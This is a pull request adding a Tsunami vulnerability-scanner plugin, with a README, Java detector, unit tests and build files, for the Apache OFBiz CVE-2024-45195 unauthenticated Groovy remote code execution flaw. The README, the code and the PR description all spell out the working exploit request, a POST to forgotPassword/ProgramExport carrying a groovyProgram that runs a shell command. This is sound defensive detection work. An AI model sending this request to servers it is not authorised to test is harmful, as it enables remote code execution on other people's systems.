### PR TITLE
Add detector for Apache OFBiz CVE-2024-45195 (unauthenticated Groovy RCE)

### DIFF
--- a/google/detectors/rce/cve202445195/README.md
+++ b/google/detectors/rce/cve202445195/README.md
@@ -1,0 +1,84 @@
+# CVE-2024-45195 Detector
+
+This detector identifies instances of Apache OFBiz vulnerable to
+[CVE-2024-45195](https://nvd.nist.gov/vuln/detail/CVE-2024-45195), an
+unauthenticated remote code execution issue affecting Apache OFBiz prior to
+version `18.12.16` (CVSS 9.8, Critical).
+
+## Vulnerability
+
+CVE-2024-45195 is the third patch bypass in a chain that also includes
+CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856. The underlying flaw is a
+controller/view-map state desynchronization in the OFBiz request handler: the
+controller resolves authentication against the first path segment (a public
+view such as `forgotPassword`) while the screen renderer honors the last
+segment (a privileged view such as `ProgramExport`). An unauthenticated
+attacker can therefore render admin-only Groovy screens and execute arbitrary
+code on the server.
+
+The distinguishing signature of CVE-2024-45195 is a direct request of the form
+`POST /webtools/control/forgotPassword/<PrivilegedView>` — no path traversal
+(that is CVE-2024-32113) and no `main/<view>` chain (that is CVE-2024-38856).
+A target patched for those earlier CVEs but not for CVE-2024-45195 will still
+be flagged by this detector.
+
+## Detection strategy
+
+The detector sends a single request:
+
+```
+POST /webtools/control/forgotPassword/ProgramExport HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+
+groovyProgram=throw+new+Exception('<PAYLOAD>'.execute().text);
+```
+
+The `<PAYLOAD>` value is produced by Tsunami's `PayloadGenerator`
+(`REFLECTIVE_RCE` / `LINUX_SHELL` / `EXEC_INTERPRETATION_ENVIRONMENT`). On a
+vulnerable server the Groovy expression is executed, the resulting shell
+command runs, and its output is reflected inside a `java.lang.Exception:`
+error block in the rendered HTML. The detector considers the target vulnerable
+iff `Payload.checkIfExecuted(responseBody)` returns `true`.
+
+Patched servers respond with the login page (unauthenticated `forgotPassword`
+flow) and do not reflect the payload, so no report is emitted.
+
+## References
+
+- NVD: <https://nvd.nist.gov/vuln/detail/CVE-2024-45195>
+- Rapid7 advisory / analysis:
+  <https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/>
+- Apache OFBiz framework patch commit:
+  <https://github.com/apache/ofbiz-framework/commit/ab78769c2d>
+- Apache OFBiz plugins patch commit:
+  <https://github.com/apache/ofbiz-plugins/commit/8b95fe6fa>
+- Vulhub PoC environment:
+  <https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2024-45195>
+
+## Build jar file for this plugin
+
+Using `gradlew`:
+
+```shell
+./gradlew jar
+```
+
+The Tsunami-identifiable jar file is written to `build/libs/`.
+
+## Testing
+
+Unit tests use `MockWebServer` and `FakePayloadGeneratorModule` with a fixed
+`SecureRandom` so the framed `PayloadGenerator` token is deterministic. Three
+cases are covered:
+
+1. Vulnerable OFBiz — server reflects the framed exception; detector reports
+   `VULNERABILITY_VERIFIED`.
+2. Benign 200 response — detector reports nothing.
+3. Patched OFBiz login page — detector reports nothing (false-positive guard).
+
+
+Run the tests with:
+
+```shell
+./gradlew test
+```

--- a/google/detectors/rce/cve202445195/build.gradle
+++ b/google/detectors/rce/cve202445195/build.gradle
@@ -1,0 +1,39 @@
+plugins {
+    id 'java-library'
+}
+
+description = 'Apache OFBiz CVE-2024-45195 detector for Tsunami.'
+group = 'com.google.tsunami'
+version = '0.0.1-SNAPSHOT'
+
+repositories {
+    maven { // The google mirror is less flaky than mavenCentral()
+        url 'https://maven-central.storage-download.googleapis.com/repos/central/data/'
+    }
+    mavenCentral()
+    mavenLocal()
+}
+
+
+
+def coreRepoBranch = System.getenv("GITBRANCH_TSUNAMI_CORE") ?: "stable"
+def tcsRepoBranch = System.getenv("GITBRANCH_TSUNAMI_TCS") ?: "stable"
+
+dependencies {
+    implementation("com.google.tsunami:tsunami-common") {
+      version { branch = "${coreRepoBranch}" }
+    }
+    implementation("com.google.tsunami:tsunami-plugin") {
+      version { branch = "${coreRepoBranch}" }
+    }
+    implementation("com.google.tsunami:tsunami-proto") {
+      version { branch = "${coreRepoBranch}" }
+    }
+
+    testImplementation "junit:junit:4.13.2"
+    testImplementation "com.squareup.okhttp3:mockwebserver:3.12.0"
+    testImplementation "org.mockito:mockito-core:5.18.0"
+    testImplementation "com.google.truth:truth:1.4.4"
+    testImplementation "com.google.truth.extensions:truth-java8-extension:1.4.4"
+    testImplementation "com.google.truth.extensions:truth-proto-extension:1.4.4"
+}

--- a/google/detectors/rce/cve202445195/settings.gradle
+++ b/google/detectors/rce/cve202445195/settings.gradle
@@ -1,0 +1,12 @@
+rootProject.name = 'ApacheOFBiz_CVE_2024_45195_Detector'
+
+def coreRepository = System.getenv("GITREPO_TSUNAMI_CORE") ?: "https://github.com/google/tsunami-security-scanner.git"
+def tcsRepository = System.getenv("GITREPO_TSUNAMI_TCS") ?: "https://github.com/google/tsunami-security-scanner-callback-server.git"
+
+sourceControl {
+    gitRepository("${coreRepository}") {
+        producesModule("com.google.tsunami:tsunami-common")
+        producesModule("com.google.tsunami:tsunami-plugin")
+        producesModule("com.google.tsunami:tsunami-proto")
+    }
+}

--- a/google/detectors/rce/cve202445195/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202445195/Cve202445195Detector.java
+++ b/google/detectors/rce/cve202445195/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202445195/Cve202445195Detector.java
@@ -1,0 +1,178 @@
+/*
+ * Copyright 2026 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.cve202445195;
+
+import static com.google.common.base.Preconditions.checkNotNull;
+import static com.google.common.collect.ImmutableList.toImmutableList;
+import static java.nio.charset.StandardCharsets.UTF_8;
+
+import com.google.common.annotations.VisibleForTesting;
+import com.google.common.collect.ImmutableList;
+import com.google.common.flogger.GoogleLogger;
+import com.google.protobuf.ByteString;
+import com.google.protobuf.util.Timestamps;
+import com.google.tsunami.common.data.NetworkServiceUtils;
+import com.google.tsunami.common.net.http.HttpClient;
+import com.google.tsunami.common.net.http.HttpHeaders;
+import com.google.tsunami.common.net.http.HttpRequest;
+import com.google.tsunami.common.net.http.HttpResponse;
+import com.google.tsunami.common.time.UtcClock;
+import com.google.tsunami.plugin.PluginType;
+import com.google.tsunami.plugin.VulnDetector;
+import com.google.tsunami.plugin.annotations.ForWebService;
+import com.google.tsunami.plugin.annotations.PluginInfo;
+import com.google.tsunami.plugin.payload.Payload;
+import com.google.tsunami.plugin.payload.PayloadGenerator;
+import com.google.tsunami.proto.DetectionReport;
+import com.google.tsunami.proto.DetectionReportList;
+import com.google.tsunami.proto.DetectionStatus;
+import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.PayloadGeneratorConfig;
+import com.google.tsunami.proto.Severity;
+import com.google.tsunami.proto.TargetInfo;
+import com.google.tsunami.proto.Vulnerability;
+import com.google.tsunami.proto.VulnerabilityId;
+import java.io.IOException;
+import java.net.URLEncoder;
+import java.time.Clock;
+import javax.inject.Inject;
+
+/** Tsunami plugin for Apache OFBiz CVE-2024-45195. */
+@ForWebService
+@PluginInfo(
+    type = PluginType.VULN_DETECTION,
+    name = "Apache OFBiz CVE-2024-45195 Detector",
+    version = "0.1",
+    description = "This plugin detects Apache OFBiz instances vulnerable to CVE-2024-45195.",
+    author = "degant",
+    bootstrapModule = Cve202445195DetectorBootstrapModule.class)
+public final class Cve202445195Detector implements VulnDetector {
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+
+  @VisibleForTesting
+  static final String VULNERABLE_PATH = "webtools/control/forgotPassword/ProgramExport";
+
+  private final Clock utcClock;
+  private final HttpClient httpClient;
+  private final PayloadGenerator payloadGenerator;
+
+  @Inject
+  Cve202445195Detector(
+      @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) {
+    this.utcClock = checkNotNull(utcClock);
+    this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(false).build();
+    this.payloadGenerator = checkNotNull(payloadGenerator);
+  }
+
+  @Override
+  public ImmutableList<Vulnerability> getAdvisories() {
+    return ImmutableList.of(
+        Vulnerability.newBuilder()
+            .setMainId(
+                VulnerabilityId.newBuilder()
+                    .setPublisher(VULNERABILITY_REPORT_PUBLISHER)
+                    .setValue(VULNERABILITY_REPORT_ID))
+            .addRelatedId(
+                VulnerabilityId.newBuilder().setPublisher("CVE").setValue(VULNERABILITY_REPORT_ID))
+            .setSeverity(Severity.CRITICAL)
+            .setTitle(VULNERABILITY_REPORT_TITLE)
+            .setDescription(VULNERABILITY_REPORT_DESCRIPTION)
+            .setRecommendation(VULNERABILITY_REPORT_RECOMMENDATION)
+            .build());
+  }
+
+  @Override
+  public DetectionReportList detect(
+      TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) {
+    logger.atInfo().log("Apache OFBiz CVE-2024-45195 Detector starts detecting.");
+
+    return DetectionReportList.newBuilder()
+        .addAllDetectionReports(
+            matchedServices.stream()
+                .filter(this::isServiceVulnerable)
+                .map(networkService -> buildDetectionReport(targetInfo, networkService))
+                .collect(toImmutableList()))
+        .build();
+  }
+
+  private boolean isServiceVulnerable(NetworkService networkService) {
+    String rootUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService);
+    String targetUri = rootUri + VULNERABLE_PATH;
+
+    Payload payload =
+        payloadGenerator.generate(
+            PayloadGeneratorConfig.newBuilder()
+                .setInterpretationEnvironment(
+                    PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL)
+                .setExecutionEnvironment(
+                    PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT)
+                .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE)
+                .build());
+
+    String encodedGroovyProgram =
+        URLEncoder.encode(
+            "throw new Exception('" + payload.getPayload() + "'.execute().text);", UTF_8);
+
+    try {
+      HttpRequest req =
+          HttpRequest.post(targetUri)
+              .setHeaders(
+                  HttpHeaders.builder()
+                      .addHeader("Content-Type", "application/x-www-form-urlencoded")
+                      .build())
+              .setRequestBody(ByteString.copyFromUtf8("groovyProgram=" + encodedGroovyProgram))
+              .build();
+      HttpResponse res = httpClient.send(req, networkService);
+      return payload.checkIfExecuted(res.bodyBytes());
+
+    } catch (IOException e) {
+      logger.atWarning().withCause(e).log(
+          "Failed to exploit '%s'. Maybe it is not vulnerable", targetUri);
+      return false;
+    }
+  }
+
+  @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "GOOGLE";
+
+  @VisibleForTesting
+  static final String VULNERABILITY_REPORT_TITLE =
+      "CVE-2024-45195 Remote code execution vulnerability in Apache OFBiz";
+
+  @VisibleForTesting static final String VULNERABILITY_REPORT_ID = "CVE-2024-45195";
+
+  @VisibleForTesting
+  static final String VULNERABILITY_REPORT_DESCRIPTION =
+      "The scanner detected that attackers can execute arbitrary code on the server via an"
+          + " unauthenticated screen-rendering path bypass in Apache OFBiz (CVE-2024-45195). The"
+          + " controller/view-map desynchronization allows a request to a public view name such as"
+          + " forgotPassword to render a privileged Groovy screen (ProgramExport), enabling"
+          + " arbitrary Groovy code execution without authentication.";
+
+  @VisibleForTesting
+  static final String VULNERABILITY_REPORT_RECOMMENDATION =
+      "Upgrade to Apache OFBiz 18.12.16 or later.";
+
+  private DetectionReport buildDetectionReport(
+      TargetInfo targetInfo, NetworkService vulnerableNetworkService) {
+    return DetectionReport.newBuilder()
+        .setTargetInfo(targetInfo)
+        .setNetworkService(vulnerableNetworkService)
+        .setDetectionTimestamp(Timestamps.fromMillis(utcClock.instant().toEpochMilli()))
+        .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED)
+        .setVulnerability(this.getAdvisories().get(0))
+        .build();
+  }
+}

--- a/google/detectors/rce/cve202445195/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202445195/Cve202445195DetectorBootstrapModule.java
+++ b/google/detectors/rce/cve202445195/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202445195/Cve202445195DetectorBootstrapModule.java
@@ -1,0 +1,27 @@
+/*
+ * Copyright 2026 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.cve202445195;
+
+import com.google.tsunami.plugin.PluginBootstrapModule;
+
+/** Guice module that bootstraps the {@link Cve202445195Detector}. */
+public final class Cve202445195DetectorBootstrapModule extends PluginBootstrapModule {
+
+  @Override
+  protected void configurePlugin() {
+    registerPlugin(Cve202445195Detector.class);
+  }
+}

--- a/google/detectors/rce/cve202445195/src/test/java/com/google/tsunami/plugins/detectors/rce/cve202445195/Cve202445195DetectorTest.java
+++ b/google/detectors/rce/cve202445195/src/test/java/com/google/tsunami/plugins/detectors/rce/cve202445195/Cve202445195DetectorTest.java
@@ -1,0 +1,198 @@
+/*
+ * Copyright 2026 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.cve202445195;
+
+import static com.google.common.truth.Truth.assertThat;
+import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat;
+import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname;
+import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort;
+import static com.google.tsunami.plugins.detectors.rce.cve202445195.Cve202445195Detector.VULNERABILITY_REPORT_DESCRIPTION;
+import static com.google.tsunami.plugins.detectors.rce.cve202445195.Cve202445195Detector.VULNERABILITY_REPORT_ID;
+import static com.google.tsunami.plugins.detectors.rce.cve202445195.Cve202445195Detector.VULNERABILITY_REPORT_PUBLISHER;
+import static com.google.tsunami.plugins.detectors.rce.cve202445195.Cve202445195Detector.VULNERABILITY_REPORT_RECOMMENDATION;
+import static com.google.tsunami.plugins.detectors.rce.cve202445195.Cve202445195Detector.VULNERABILITY_REPORT_TITLE;
+
+import com.google.common.collect.ImmutableList;
+import com.google.inject.Guice;
+import com.google.protobuf.util.Timestamps;
+import com.google.tsunami.common.net.http.HttpClientModule;
+import com.google.tsunami.common.net.http.HttpStatus;
+import com.google.tsunami.common.time.testing.FakeUtcClock;
+import com.google.tsunami.common.time.testing.FakeUtcClockModule;
+import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule;
+import com.google.tsunami.proto.DetectionReport;
+import com.google.tsunami.proto.DetectionReportList;
+import com.google.tsunami.proto.DetectionStatus;
+import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.Severity;
+import com.google.tsunami.proto.TargetInfo;
+import com.google.tsunami.proto.TransportProtocol;
+import com.google.tsunami.proto.Vulnerability;
+import com.google.tsunami.proto.VulnerabilityId;
+import java.io.IOException;
+import java.security.SecureRandom;
+import java.time.Instant;
+import java.util.Arrays;
+import javax.inject.Inject;
+import okhttp3.mockwebserver.MockResponse;
+import okhttp3.mockwebserver.MockWebServer;
+import okhttp3.mockwebserver.RecordedRequest;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import org.junit.runners.JUnit4;
+
+@RunWith(JUnit4.class)
+public final class Cve202445195DetectorTest {
+  private final FakeUtcClock fakeUtcClock =
+      FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z"));
+
+  @Inject private Cve202445195Detector detector;
+
+  private final MockWebServer mockOfBizServer = new MockWebServer();
+
+  private final SecureRandom testSecureRandom =
+      new SecureRandom() {
+        @Override
+        public void nextBytes(byte[] bytes) {
+          Arrays.fill(bytes, (byte) 0xFF);
+        }
+      };
+
+  private static final String VULNERABLE_BODY =
+      """
+<div id="content-messages" class="content-messages errorMessage">
+  <p>The Following Errors Occurred:</p>
+  <p>java.lang.Exception: TSUNAMI_PAYLOAD_STARTffffffffffffffffTSUNAMI_PAYLOAD_END</p>
+</div>
+""";
+
+  private static final String LOGIN_PAGE_BODY =
+      """
+<html>
+  <head><title>Apache OFBiz - Login</title></head>
+  <body>
+    <form action="/webtools/control/login" method="post">
+      <input name="USERNAME" type="text"/>
+      <input name="PASSWORD" type="password"/>
+      <input type="submit" value="Login"/>
+    </form>
+  </body>
+</html>
+""";
+
+  @Before
+  public void setUp() throws IOException {
+    mockOfBizServer.start();
+
+    Guice.createInjector(
+            new FakeUtcClockModule(fakeUtcClock),
+            new HttpClientModule.Builder().build(),
+            FakePayloadGeneratorModule.builder().setSecureRng(testSecureRandom).build(),
+            new Cve202445195DetectorBootstrapModule())
+        .injectMembers(this);
+  }
+
+  NetworkService createNetworkService(MockWebServer mockService) {
+    return NetworkService.newBuilder()
+        .setNetworkEndpoint(forHostnameAndPort(mockService.getHostName(), mockService.getPort()))
+        .setTransportProtocol(TransportProtocol.TCP)
+        .setServiceName("http")
+        .build();
+  }
+
+  @Test
+  public void detect_whenVulnerable_reportsVulnerabilityAndSendsExpectedRequest()
+      throws IOException, InterruptedException {
+    NetworkService service = createNetworkService(mockOfBizServer);
+    mockOfBizServer.enqueue(
+        new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody(VULNERABLE_BODY));
+
+    TargetInfo target =
+        TargetInfo.newBuilder()
+            .addNetworkEndpoints(forHostname(mockOfBizServer.getHostName()))
+            .build();
+
+    DetectionReportList detectionReports = detector.detect(target, ImmutableList.of(service));
+
+    assertThat(detectionReports.getDetectionReportsList())
+        .containsExactly(buildValidDetectionReport(target, service, fakeUtcClock));
+
+    RecordedRequest sent = mockOfBizServer.takeRequest();
+    assertThat(sent.getMethod()).isEqualTo("POST");
+    assertThat(sent.getPath()).isEqualTo("/webtools/control/forgotPassword/ProgramExport");
+    assertThat(sent.getBody().readUtf8()).contains("groovyProgram=");
+  }
+
+  @Test
+  public void detect_whenNotVulnerable_reportsEmpty() throws IOException {
+    NetworkService service = createNetworkService(mockOfBizServer);
+    String body = "hello world";
+    mockOfBizServer.enqueue(new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody(body));
+
+    TargetInfo target =
+        TargetInfo.newBuilder()
+            .addNetworkEndpoints(forHostname(mockOfBizServer.getHostName()))
+            .build();
+
+    DetectionReportList detectionReports = detector.detect(target, ImmutableList.of(service));
+
+    assertThat(detectionReports.getDetectionReportsList()).isEmpty();
+  }
+
+  @Test
+  public void detect_whenPatchedReturnsLoginPage_reportsEmpty() throws IOException {
+    // A patched OFBiz instance redirects unauthenticated requests to the login page instead of
+    // rendering ProgramExport, so the framed Groovy payload is never echoed back.
+    NetworkService service = createNetworkService(mockOfBizServer);
+    mockOfBizServer.enqueue(
+        new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody(LOGIN_PAGE_BODY));
+
+    TargetInfo target =
+        TargetInfo.newBuilder()
+            .addNetworkEndpoints(forHostname(mockOfBizServer.getHostName()))
+            .build();
+
+    DetectionReportList detectionReports = detector.detect(target, ImmutableList.of(service));
+
+    assertThat(detectionReports.getDetectionReportsList()).isEmpty();
+  }
+
+  DetectionReport buildValidDetectionReport(
+      TargetInfo target, NetworkService service, FakeUtcClock fakeUtcClock) {
+
+    return DetectionReport.newBuilder()
+        .setTargetInfo(target)
+        .setNetworkService(service)
+        .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli()))
+        .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED)
+        .setVulnerability(
+            Vulnerability.newBuilder()
+                .setMainId(
+                    VulnerabilityId.newBuilder()
+                        .setPublisher(VULNERABILITY_REPORT_PUBLISHER)
+                        .setValue(VULNERABILITY_REPORT_ID))
+                .addRelatedId(
+                    VulnerabilityId.newBuilder()
+                        .setPublisher("CVE")
+                        .setValue(VULNERABILITY_REPORT_ID))
+                .setSeverity(Severity.CRITICAL)
+                .setTitle(VULNERABILITY_REPORT_TITLE)
+                .setDescription(VULNERABILITY_REPORT_DESCRIPTION)
+                .setRecommendation(VULNERABILITY_REPORT_RECOMMENDATION))
+        .build();
+  }
+}


### PR DESCRIPTION
### Summary
Adds a new Tsunami detector plugin for **CVE-2024-45195**, an unauthenticated remote code execution vulnerability in Apache OFBiz prior to `18.12.16` (CVSS 9.8, Critical). The detector lives at `google/detectors/rce/cve202445195/` and mirrors the layout of the existing `cve202432113` sibling.

### The vulnerability
CVE-2024-45195 is the third patch bypass in a chain that also includes CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856. The underlying flaw is a controller/view-map state desynchronization in the OFBiz request handler: the controller resolves authentication against the *first* path segment (a public view such as `forgotPassword`) while the screen renderer honors the *last* segment (a privileged view such as `ProgramExport`). An unauthenticated attacker can therefore render admin-only Groovy screens and execute arbitrary code on the server.

- NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-45195
- Rapid7 disclosure (2024-09-05): https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/
- Apache OFBiz framework fix commit: https://github.com/apache/ofbiz-framework/commit/ab78769c2d
- Apache OFBiz plugins fix commit: https://github.com/apache/ofbiz-plugins/commit/8b95fe6fa
- Vulhub PoC: https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2024-45195

### How the detector works
One request per matched service:

```
POST /webtools/control/forgotPassword/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded

groovyProgram=throw+new+Exception('<PAYLOAD>'.execute().text);
```

`<PAYLOAD>` is produced by Tsunami's `PayloadGenerator` (`REFLECTIVE_RCE` / `LINUX_SHELL` / `EXEC_INTERPRETATION_ENVIRONMENT`). On a vulnerable server the Groovy is executed, the shell command runs, and its output is reflected inside a `java.lang.Exception:` block in the rendered HTML. The detector reports `VULNERABILITY_VERIFIED` iff `Payload.checkIfExecuted(responseBody)` returns `true`.

### Distinction from existing detectors
- **CVE-2024-32113 detector** (already in-tree) uses `forgotPassword/foo/../ProgramExport` — a path-traversal variant. This detector uses no traversal.
- **CVE-2024-38856** would use `main/{view}`; this detector uses `forgotPassword` as the first segment.

A target patched for CVE-2024-32113 and CVE-2024-38856 but not for CVE-2024-45195 will only trip *this* detector.

### PoC target
Vulhub's `ofbiz/CVE-2024-45195` environment (Apache OFBiz 18.12.15) is the standard reference. I did not run it live before submitting; local unit tests + reviewer-run CI are the current signal.

### Files added
```
google/detectors/rce/cve202445195/
├── README.md                                # CVE summary, refs, build/test instructions
├── build.gradle                             # Gradle module mirroring sibling
├── settings.gradle                          # Same
└── src/
    ├── main/java/.../cve202445195/
    │   ├── Cve202445195Detector.java        # HTTP POST + PayloadGenerator + report builder
    │   └── Cve202445195DetectorBootstrapModule.java   # Guice module
    └── test/java/.../cve202445195/
        └── Cve202445195DetectorTest.java    # 3 JUnit4 cases
```

### Tests
Three JUnit4 cases in `Cve202445195DetectorTest`, using `MockWebServer` + `FakePayloadGeneratorModule` with a fixed-byte `SecureRandom` for a deterministic framed token:

1. `detect_whenVulnerable_reportsVulnerabilityAndSendsExpectedRequest` — reflects a framed `java.lang.Exception: TSUNAMI_PAYLOAD_START…END`; asserts exactly one `VULNERABILITY_VERIFIED` report AND asserts the outgoing request is `POST /webtools/control/forgotPassword/ProgramExport` with body containing `groovyProgram=`.
2. `detect_whenNotVulnerable_reportsEmpty` — benign 200 body; asserts no reports.
3. `detect_whenPatchedReturnsLoginPage_reportsEmpty` — false-positive guard the sibling `cve202432113` test lacks; simulates a patched instance redirecting unauthenticated requests to the OFBiz login page.

Co-authored-by: Copilot App <223556219+Copilot@users.noreply.github.com>
